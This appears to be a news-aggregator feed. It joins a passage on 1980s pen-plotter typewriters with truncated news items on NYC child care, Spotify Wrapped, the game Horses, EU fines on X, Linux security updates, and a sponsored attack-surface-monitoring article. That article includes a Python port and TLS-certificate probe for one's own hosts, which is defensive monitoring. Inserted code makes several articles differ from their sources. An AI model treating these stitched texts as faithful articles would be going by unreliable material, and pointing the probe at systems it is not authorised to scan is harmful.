Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.

Smith Corona Graphtext 90

Smith Corona sold the Graphtext 90 . No computer control. Same pens and also ran on batteries.

Brother Type-a-Graph BP-30

Not to be left out, Brother offered the Type-a-Graph BP-30 . Pics from eBay; there are usually a lot of these for sale.

Sears LXI Type-O-Graph

Even Sears got into the game with the LXI Type-O-Graph (likely by rebranding the Brother Type-a-Graph; they look the same). Mine has a flaw in the print head mechanism.

Sharp EL-7050 Calculator

Adding to the oddware that included pen plotters, there was even a calculator with a tiny plotter built in: the Sharp EL-7050. It could act as a usual printing calculator, but it could also draw graphs and pie charts of data sets.

Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.

And here’s the Sharp EL-7050 calculator plotting the graph.

Music Keyboard

Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. In reality, the plotter was so much slower than your playing that it would take forever to catch up. It also wasn’t great at quantization, so the notes were likely not what you’d expect.

Built In Plotters

Many small computers in the 1980s also had plotters available like the Commodore 1520 and the Atari 1020 . They used 4” wide paper and the same pens.

Some “slabtops” had built in pen plotters like the Casio PB-700 , Radio Shack Tandy PC-2 , and Sharp PC-2500 .

Pens

All of the typewriter models used the same ball point pens in four colors (black, red, green, blue), were portable with a built-in handle, and could run on batteries. They also likely all used the same plotter mechanisms, made by Alps.

The pens are rather scarce now; mostly all that remains is NOS (new old stock), with some exceptions for a couple of German companies that make replacements for medical equipment that happen to fit.

These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.

Mamdani’s First 100 Days, Child Care Edition: 'Fixing What Adams Broke'

hellgate
hellgatenyc.com
2025-12-05 15:07:51
Free universal child care is the incoming mayor's biggest promise—here's what he needs to do immediately to make it happen, according to experts....
Original Article

Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.

First up, a look at his plans for universal free child care.


Zohran Mamdani has consistently said that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he has promised, and the one that comes with the biggest price tag, a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to be ready to get to work as soon as he's in office, and to tackle multiple challenges at once.

The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.


Covid-19 mRNA Vaccination and 4-Year All-Cause Mortality

Hacker News
jamanetwork.com
2025-12-05 15:07:42
Comments...

I spent hours listening to Sabrina Carpenter this year. So why do I have a Spotify ‘listening age’ of 86?

Guardian
www.theguardian.com
2025-12-05 15:07:00
Many users of the app were shocked this week by this addition to the Spotify Wrapped roundup – especially twentysomethings who were judged to be 100...
Original Article

“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.

I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day Spotify released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.

“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.

It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.

But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,” wrote one user on X. Another post , with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.

“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.

“How could I have a listening age of 86,” I raged to my family and friends, “when the artist I listened to the most this year was 26-year-old Sabrina Carpenter?” Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.

The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).

Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.

It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.

What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.

None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had 500 million shares on social media, a 41% increase on last year.

According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.
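Spotify has not published its exact formula, but the description above is enough to sketch the idea. Here is a toy Python version; the minute counts, the peer baseline, and the assumption that "formative years" centre on roughly age 15 are all invented for illustration, not Spotify's real methodology:

```python
# Toy sketch of the "reminiscence bump" logic described above.
# All numbers and the age-15 "formative years" midpoint are invented.

def listening_age(minutes_by_release_year, peer_minutes, this_year=2025, formative_age=15):
    """Find the 5-year release span where this listener over-indexes most
    against peers, then assume they were ~formative_age in its middle year."""
    best_start, best_ratio = None, 0.0
    for start in minutes_by_release_year:
        span = range(start, start + 5)
        mine = sum(minutes_by_release_year.get(y, 0) for y in span)
        peers = sum(peer_minutes.get(y, 1) for y in span)  # default 1 avoids div by zero
        if mine / peers > best_ratio:
            best_start, best_ratio = start, mine / peers
    midpoint = best_start + 2  # middle year of the winning 5-year span
    return this_year - midpoint + formative_age

me = {1957: 300, 1958: 250, 1959: 200, 2023: 700, 2024: 900}
peers = {1957: 5, 1958: 5, 1959: 5, 2023: 800, 2024: 1000}
print(listening_age(me, peers))  # the late-50s span wins -> 81
```

Under these toy numbers, a few hundred minutes of late-50s releases outweigh thousands of minutes of new music, because the comparison is against how much peers engage with the same span, not against the listener's own totals.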

In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.

But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.

Horror game Horses has been banned from sale – but is it as controversial as you’d think?

Guardian
www.theguardian.com
2025-12-05 15:04:14
Pulled by Steam and Epic Games Store, indie horror Horses shook up the industry before it was even released. Now it’s out, all the drama surrounding it seems superfluous On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnal...
Original Article

On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia, revealed that its latest project, Horses, had been banned from Steam, the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.

The controversy has helped the game rocket to the top of the digital stores that are selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.

Controversial … a still from Horses. Photograph: Santa Ragione

The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.

Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.

It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).

Unsettling … a still from Horses. Photograph: Santa Ragione

The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.

Valve, the company that owns Steam, told PC Gamer that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”

According to IGN, Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”

Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film); the imagery runs to super-up-close shots of mouths moving as they talk or chew, unsettling character models, and the occasional cut to a real-life shot of water pouring into a glass or slop filling up a dog bowl.

There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.

A Practical Guide to Continuous Attack Surface Visibility

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 15:00:10
Passive scan data goes stale fast as cloud assets shift daily, leaving teams blind to real exposures. Sprocket Security shows how continuous, automated recon gives accurate, up-to-date attack surface visibility. [...]...
Original Article


AUTHOR: Topher Lyons, Solutions Engineer at Sprocket Security

The Limits of Passive Internet-Scan Data

Most organizations are familiar with the traditional approach to external visibility: rely on passive internet-scan data, subscription-based datasets, or occasional point-in-time reconnaissance to understand what they have facing the public internet. These sources are typically delivered as static snapshots: lists of assets, open ports, or exposures observed during a periodic scan cycle.

While useful for broad trend awareness, passive datasets are often misunderstood. Many security teams assume they provide a complete picture of everything attackers can see. But in today’s highly dynamic infrastructure, passive data ages quickly.

Cloud footprints shift by the day, development teams deploy new services continuously, and misconfigurations appear (and disappear) far faster than passive scans can keep up.

As a result, organizations relying solely on passive data often make decisions based on stale or incomplete information.

To maintain an accurate, defensive view of the external attack surface, teams need something different: continuous, automated, active reconnaissance that verifies what’s actually exposed every day.

Today’s Attack Surface: Fast-Moving, Fragmented, and Hard to Track

Attack surfaces used to be relatively static. A perimeter firewall, a few public-facing servers, and a DNS zone or two made discovery manageable. But modern infrastructure has changed everything.

  • Cloud adoption has decentralized hosting, pushing assets across multiple providers and regions.
  • Rapid deployment cycles introduce new services, containers, or endpoints.
  • Asset sprawl grows quietly as teams experiment, test, or automate.
  • Shadow IT emerges from marketing campaigns, SaaS tools, vendor-hosted environments, and unmanaged subdomains.

Even seemingly insignificant changes can create material exposure. A DNS record that points to the wrong host, an expired TLS certificate, or a forgotten dev instance can all introduce risk. And because these changes occur constantly, visibility that isn’t refreshed continuously will always fall out of sync with reality.

If the attack surface changes daily, then visibility must match that cadence.

Why Passive Data Fails Modern Security Teams

Stale Findings

Passive scan data becomes outdated quickly. An exposed service may disappear before a team even sees the report, while new exposures emerge that weren’t captured at all. This leads to a common cycle where security teams spend time chasing issues that no longer exist while missing the ones that matter today.

Context Gaps

Passive datasets tend to be shallow. They often lack:

  • Ownership
  • Attribution
  • Root-cause detail
  • Impact context
  • Environmental awareness

Without context, teams can’t prioritize effectively. A minor informational issue may look identical to a severe exposure.

Missed Ephemeral Assets

Modern infrastructure is full of short-lived components. Temporary testing services, auto-scaled cloud nodes, and misconfigured trial environments might live for only minutes or hours. Because passive scans are periodic, these fleeting assets often never appear in the dataset, yet attackers routinely find and exploit them.

Duplicate or Irrelevant Artifacts

Passive data commonly includes leftover DNS records, reassigned IP space, or historical entries that no longer reflect the environment. Teams must manually separate false positives from real issues, increasing alert fatigue and wasting time.

Continuous Reconnaissance: What It Is (and Isn’t)

Automated, Active Daily Checks

Continuous visibility relies on recurring, controlled reconnaissance that automatically verifies external exposure. This includes:

  • Detecting newly exposed services
  • Tracking DNS, certificate, and hosting changes
  • Identifying new reachable hosts
  • Classifying new or unknown assets
  • Validating current exposure and configuration state

This is not exploitation or intrusive action. It's safe, automated enumeration built for defense.
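As a concrete (and deliberately simple) illustration of what such a daily check can look like, the sketch below probes a known asset list for open ports and TLS certificate expiry, then diffs the result against yesterday's snapshot. The hostnames, ports, and snapshot path are hypothetical placeholders, and this is not Sprocket's implementation, just the general pattern using Python's standard library:

```python
# Minimal daily exposure check: safe enumeration only, no exploitation.
# Hostnames, ports, and the snapshot path are hypothetical placeholders.
import json
import socket
import ssl
from pathlib import Path

ASSETS = ["app.example.com", "staging.example.com"]  # your external inventory
PORTS = [22, 80, 443, 3389]
SNAPSHOT = Path("exposure-snapshot.json")

def open_ports(host, ports, timeout=2):
    """Return the subset of ports that accept a TCP connection."""
    found = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass
    return found

def cert_not_after(host, port=443, timeout=4):
    """Return the TLS certificate's notAfter string, or None if unreachable."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            ctx = ssl.create_default_context()
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.getpeercert()["notAfter"]
    except OSError:
        return None

today = {h: {"ports": open_ports(h, PORTS), "cert_expires": cert_not_after(h)}
         for h in ASSETS}
yesterday = json.loads(SNAPSHOT.read_text()) if SNAPSHOT.exists() else {}

for host, state in today.items():
    if state != yesterday.get(host):
        print(f"[change] {host}: {state}")  # route this to your alerting
SNAPSHOT.write_text(json.dumps(today, indent=2))
```

Run from cron or a scheduler, the diff-against-yesterday step is what turns a scan into continuous visibility: only changes surface, not the full inventory every day.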

Environment-Aware Discovery

As infrastructure shifts, continuous recon shifts with it. New cloud regions, new subdomains, or new testing environments naturally enter and exit the attack surface. Continuous visibility keeps pace automatically with no manual refresh required.

What Continuous Visibility Reveals (That Passive Data Can’t)

Newly Exposed Services

These exposures often appear suddenly and unintentionally:

  • A forgotten staging server coming online
  • A developer opening RDP or SSH for testing
  • A newly created S3 bucket left public

Daily verification catches these before attackers do.

Misconfigurations Introduced During Deployments

Rapid deployments introduce subtle errors:

  • Certificates misapplied or expired
  • Default configurations restored
  • Ports opened unexpectedly

Daily visibility surfaces them immediately.

Shadow IT and Rogue Assets

Not every externally exposed asset originates from engineering. Marketing microsites, vendor-hosted services, third-party landing pages, and unmanaged SaaS instances often fall outside traditional inventories, yet remain publicly reachable.

Real-Time Validation

Continuous recon ensures findings reflect today’s attack surface. This dramatically reduces wasted effort and improves decision-making.

Turning Reconnaissance into Decision Making

Prioritization Through Verification

When findings are validated and current, security teams can confidently determine which exposures pose the most immediate risk.

Triage Without Hunting Through Noise

Continuous recon removes stale, duplicated, or irrelevant findings before they ever reach an analyst’s queue.

Clear Ownership Paths

Accurate attribution helps teams route issues to the correct internal group, like engineering, cloud, networking, marketing, or a specific application team.

Reduced Alert Fatigue

Security teams stay focused on real, actionable issues rather than wading through thousands of unverified scan entries.

How Sprocket Security Approaches ASM

Sprocket’s ASM Community Edition Dashboard

Daily Reconnaissance at Scale

Sprocket Security performs automated, continuous checks across your entire external footprint. Exposures are discovered and validated as they appear, whether they persist for hours or minutes.

Actionable Findings

Through our ASM framework, each finding is classified, verified, attributed, and prioritized. This ensures clarity, context, and impact without overwhelming volume.

Removing Guesswork from ASM

A validated, contextualized finding tells teams:

  • What changed
  • Why it matters
  • How severe it is
  • Who owns it
  • What action to take

Compared to raw scan data, this eliminates ambiguity and reduces the time it takes to resolve issues.

Getting a Handle on Your Attack Surface

Here are some of the ways that organizations can ensure thorough monitoring of their attack surface:

  1. Maintain an accurate asset inventory.
  2. Implement continuous monitoring.
  3. Prioritize vulnerabilities based on risk.
  4. Automate where possible.
  5. Regularly update and patch systems.

For a deeper dive into improving your attack surface know-how, see our full blog on Attack Surface Monitoring: Core Functions, Challenges, and Best Practices.

Modern Security Demands Continuous Visibility

Today’s attack surfaces evolve constantly. Static, passive datasets simply cannot keep up. To stay ahead of emerging exposures and prevent easily avoidable incidents, security teams need continuous, automated reconnaissance that reflects the real state of their environment.

Relying solely on passive data creates blind spots. Continuous visibility closes them. As organizations modernize their infrastructure and accelerate deployment cycles, continuous reconnaissance becomes the foundation of attack surface hygiene, prioritization, and real-world risk reduction.

Sponsored and written by Sprocket Security .

EU fines X $140 million over deceptive blue checkmarks

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 14:41:01
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA). [...]...
Original Article


The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).

This is the first non-compliance ruling under the DSA, a set of rules adopted in 2022 that requires platforms to remove harmful content and protect users across the European Union.

The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were shared with X in July 2024.

Regulators found that X had breached transparency requirements through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.

The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.

"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."

X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.

"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.

"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."

The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.

X was designated as a Very Large Online Platform (VLOP) under the EU's DSA on 25 April 2023, following its announcement that it had reached over 45 million monthly active users in the EU.


[$] Eventual Rust in CPython

Linux Weekly News
lwn.net
2025-12-05 14:33:09
Emma Smith and Kirill Podoprigora, two of Python's core developers, have opened a discussion about including Rust code in CPython, the reference implementation of the Python programming language. Initially, Rust would only be used for optional extension modules, but they would like to see Rust beco...
Original Article

The page you have tried to view ( Eventual Rust in CPython ) is currently available to LWN subscribers only.


(Alternatively, this item will become freely available on December 18, 2025)

It'll Be Left Vs. Left for Nydia Velázquez's Open Seat

hellgate
hellgatenyc.com
2025-12-05 14:32:09
And more links to start your Friday....
Original Article

The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen here , or wherever you get your podcasts


In congressional districts around the city , primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.

The district lies at the heart of the " Commie Corridor ," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez announced last month that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.

Brooklyn Borough President Antonio Reynoso kicked off his campaign for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.

"The fight must continue. And I'm ready to step up," Reynoso said in a launch video , filmed mostly in Spanish on the south side of Williamsburg where he grew up.

Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.


Security updates for Friday

Linux Weekly News
lwn.net
2025-12-05 14:12:53
Security updates have been issued by AlmaLinux (buildah, firefox, gimp:2.8, go-toolset:rhel8, ipa, kea, kernel, kernel-rt, pcs, qt6-qtquick3d, qt6-qtsvg, systemd, and valkey), Debian (chromium and unbound), Fedora (alexvsbus, CuraEngine, fcgi, libcoap, python-kdcproxy, texlive-base, timg, and xpdf),...
Original Article
Dist. ID Release Package Date
AlmaLinux ALSA-2025:22012 10 buildah 2025-12-05
AlmaLinux ALSA-2025:22363 8 firefox 2025-12-05
AlmaLinux ALSA-2025:22417 8 gimp:2.8 2025-12-05
AlmaLinux ALSA-2025:22668 8 go-toolset:rhel8 2025-12-05
AlmaLinux ALSA-2025:20994 10 ipa 2025-12-05
AlmaLinux ALSA-2025:21038 10 kea 2025-12-05
AlmaLinux ALSA-2025:21931 10 kernel 2025-12-05
AlmaLinux ALSA-2025:22388 8 kernel 2025-12-05
AlmaLinux ALSA-2025:22387 8 kernel-rt 2025-12-05
AlmaLinux ALSA-2025:21036 10 pcs 2025-12-05
AlmaLinux ALSA-2025:22361 10 qt6-qtquick3d 2025-12-05
AlmaLinux ALSA-2025:22394 10 qt6-qtsvg 2025-12-05
AlmaLinux ALSA-2025:22660 9 systemd 2025-12-04
AlmaLinux ALSA-2025:21936 10 valkey 2025-12-05
Debian DSA-6072-1 stable chromium 2025-12-04
Debian DSA-6071-1 stable unbound 2025-12-04
Fedora FEDORA-2025-fc872e9426 F42 CuraEngine 2025-12-05
Fedora FEDORA-2025-19c65f1d15 F43 CuraEngine 2025-12-05
Fedora FEDORA-2025-9831accfe9 F42 alexvsbus 2025-12-05
Fedora FEDORA-2025-673ec8d684 F43 alexvsbus 2025-12-05
Fedora FEDORA-2025-67511a59e3 F41 fcgi 2025-12-05
Fedora FEDORA-2025-d7c1457e7e F42 fcgi 2025-12-05
Fedora FEDORA-2025-93042e260c F43 fcgi 2025-12-05
Fedora FEDORA-2025-6a43695048 F42 libcoap 2025-12-05
Fedora FEDORA-2025-d408d76c4a F43 libcoap 2025-12-05
Fedora FEDORA-2025-3075610004 F41 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-068c570cbf F42 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-3f9b87b0e7 F43 python-kdcproxy 2025-12-05
Fedora FEDORA-2025-e72c726192 F42 texlive-base 2025-12-05
Fedora FEDORA-2025-7c5b6a3bcb F43 texlive-base 2025-12-05
Fedora FEDORA-2025-f0df882417 F42 timg 2025-12-05
Fedora FEDORA-2025-d2b7d94014 F43 timg 2025-12-05
Fedora FEDORA-2025-e72c726192 F42 xpdf 2025-12-05
Fedora FEDORA-2025-7c5b6a3bcb F43 xpdf 2025-12-05
Mageia MGASA-2025-0316 9 digikam, darktable, libraw 2025-12-05
Mageia MGASA-2025-0317 9 gnutls 2025-12-05
Mageia MGASA-2025-0320 9 python-django 2025-12-05
Mageia MGASA-2025-0318 9 unbound 2025-12-05
Mageia MGASA-2025-0319 9 webkit2 2025-12-05
Mageia MGASA-2025-0321 9 xkbcomp 2025-12-05
Oracle ELSA-2025-21034 OL10 bind 2025-12-05
Oracle ELSA-2025-21281 OL10 firefox 2025-12-05
Oracle ELSA-2025-22417 OL8 gimp:2.8 2025-12-05
Oracle ELSA-2025-21691 OL10 haproxy 2025-12-05
Oracle ELSA-2025-20994 OL10 ipa 2025-12-05
Oracle ELSA-2025-21485 OL10 java-25-openjdk 2025-12-05
Oracle ELSA-2025-21006 OL10 kea 2025-12-05
Oracle ELSA-2025-21038 OL10 kea 2025-12-05
Oracle ELSA-2025-21118 OL10 kernel 2025-12-05
Oracle ELSA-2025-21463 OL10 kernel 2025-12-05
Oracle ELSA-2025-21032 OL10 libsoup3 2025-12-05
Oracle ELSA-2025-21013 OL10 libssh 2025-12-05
Oracle ELSA-2025-20998 OL10 libtiff 2025-12-05
Oracle ELSA-2025-21248 OL10 openssl 2025-12-05
Oracle ELSA-2025-20983 OL10 podman 2025-12-05
Oracle ELSA-2025-21220 OL10 podman 2025-12-05
Oracle ELSA-2025-21037 OL10 qt6-qtsvg 2025-12-05
Oracle ELSA-2025-21002 OL10 squid 2025-12-05
Oracle ELSA-2025-22660 OL9 systemd 2025-12-05
Oracle ELSA-2025-21015 OL10 vim 2025-12-05
Oracle ELSA-2025-21035 OL10 xorg-x11-server-Xwayland 2025-12-05
Slackware SSA:2025-338-01 httpd 2025-12-04
Slackware SSA:2025-338-02 libpng 2025-12-04
SUSE openSUSE-SU-2025:15794-1 TW chromedriver 2025-12-04
SUSE SUSE-SU-2025:4320-1 SLE15 SLE-m5.5 oS15.5 kernel 2025-12-04
SUSE openSUSE-SU-2025:0461-1 osB15 python-mistralclient 2025-12-04
SUSE openSUSE-SU-2025:0460-1 osB15 python-mistralclient 2025-12-04
Ubuntu USN-7912-2 16.04 18.04 20.04 cups 2025-12-04
Ubuntu USN-7912-1 22.04 24.04 25.04 25.10 cups 2025-12-04
Ubuntu USN-7910-2 22.04 linux-azure 2025-12-05
Ubuntu USN-7909-4 22.04 linux-gcp, linux-gke, linux-gkeop 2025-12-05
Ubuntu USN-7906-2 25.10 linux-gcp 2025-12-05
Ubuntu USN-7889-5 22.04 linux-ibm-6.8 2025-12-05
Ubuntu USN-7874-3 20.04 linux-iot 2025-12-04
Ubuntu USN-7913-1 18.04 20.04 22.04 24.04 25.04 25.10 mame 2025-12-04

Emerge Career (YC S22) Is Hiring

Hacker News
www.ycombinator.com
2025-12-05 14:06:53
Comments...
Original Article

All-in-one re-entry & workforce development training platform

Founding Design Engineer

$120K - $200K 0.25% - 1.00% New York, NY, US

Role

Engineering, Full stack


About the role

Who We Are:

Emerge Career’s mission is to break the cycle of poverty and incarceration. We’re not just building software; we’re creating pathways to real second chances. Through an all-in-one platform deeply embedded within the criminal justice system, we recruit, train, and place justice-impacted individuals into life-changing careers.

Our vision is to become the country’s unified workforce development system, replacing disconnected brick-and-mortar job centers with one integrated, tech-powered solution that meets low-income individuals exactly where they are. Today, the federal government spends billions annually on education and training programs, yet only about 70% of participants graduate, just 38.6% secure training-related employment, and average first-year earnings hover around $34,708.

By contrast, our seven-person team has already outperformed the job centers in two entire states (Vermont and South Dakota) in just the past year. With an 89% graduation rate and 92% of graduates securing training-related employment, our alumni aren’t just getting jobs—they’re launching new lives with average first-year earnings of $77,352. The results speak for themselves, and we’re just getting started.

Before Emerge, our founders Zo and Gabe co-founded Ameelio, an award-winning tech nonprofit that is dismantling the prison communication duopoly. Backed by tech luminaries like Reid Hoffman, Vinod Khosla, and Jack Dorsey, and by major criminal-justice philanthropies such as Arnold Ventures and the Mellon Foundation, Ameelio became a recognized leader in the space. Because of this experience, both Zo and Gabe understood what it took to create change from within the system. After serving over 1M people impacted by incarceration, they witnessed firsthand the gap in second-chance opportunities and the chronic unemployment plaguing those impacted by the justice system. Emerge Career is committed to solving this issue.

Our students are at the heart of our work. Their journeys have captured national attention on CBS, NBC, and in The Boston Globe, and our programs now serve entire states and cities. And we’re not doing it alone: our vision has attracted support from Alexis Ohanian (776), Michael Seibel, Y Combinator, the Opportunity Fund, and public figures like Diana Taurasi, Deandre Ayton, and Marshawn Lynch. All of us believe that, with the right mix of technology and hands-on practice, we can redefine workforce development and deliver true second chances at scale.

Why We Do This:

Emerge Career was designed to tackle two systemic issues: recidivism, fueled by post-incarceration unemployment and poverty, and labor shortages in key industries. Over 60% of formerly incarcerated people remain unemployed a year after incarceration, seeking work but not finding it. The reality is shocking: workforce development programs are severely limited inside prison, with only one-third of incarcerated people ever participating. Worse, the available prison jobs offer meager wages, often less than $1 per hour, and often do not equip individuals with the skills for long-term stable employment.

About the Role

We call this a Founding Design Engineer role—even three years in and with multiple contracts under our belt—for two reasons. First, you’ll be our very first engineer, joining our co-founder, who’s built the entire platform solo to date. Second, our growth is now outpacing our systems, and we can’t keep up on maintenance alone. We’re at a critical juncture: we can either hire someone to simply care for what exists, or we can bring on a talent who believes that, with the right blend of technology and hands-on practice, we can unify the workforce-development system and deliver second chances at true scale. We hope that can be you.

This is not a traditional engineering job. You’ll do high-impact technical work, but just as often you’ll be on the phone with a student, writing documentation, debugging support issues, or figuring out how to turn a one-off solution into a repeatable system. You’ll ship features, talk to users, and fix what’s broken, whether that’s in the product or in the process. You’ll build things that matter, not just things that are asked for.

This role blends engineering, product, support, and program operations. We’re looking for someone who is energized by ownership, obsessed with user outcomes, and excited to work across domains to make things better. If you’re the kind of person who wants to be hands-on with everything—students, code, strategy, and execution—you’ll thrive here.

Who You Are:

  1. You love supporting other people’s growth. This role will feel like case work at times, and you’re drawn to that. You’ve dedicated your life to volunteering, working in social impact, or finding ways to make the playing field more fair. You find joy in helping others rise. You don’t hesitate to call, text, or meet with a student who needs you. You show up consistently, personally, and with heart.
